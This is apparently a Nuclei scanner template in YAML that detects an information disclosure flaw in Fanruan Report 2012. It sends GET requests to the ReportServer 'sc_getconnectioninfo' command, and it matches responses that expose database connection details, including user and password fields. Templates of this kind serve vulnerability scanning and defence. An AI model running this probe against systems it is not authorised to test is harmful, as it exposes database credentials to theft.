37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: fanruanoa2012-disclosure
|
|
|
|
info:
|
|
name: Fanruan Report 2012 Information Disclosure
|
|
author: YanYun
|
|
severity: high
|
|
description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
|
|
reference:
|
|
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
|
|
tags: oa,java,fanruan,disclosure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
|
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- '"connection"'
|
|
- '"name"'
|
|
- '"driver"'
|
|
- '"password"'
|
|
- '"url"'
|
|
- '"user"'
|
|
condition: and
|
|
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header |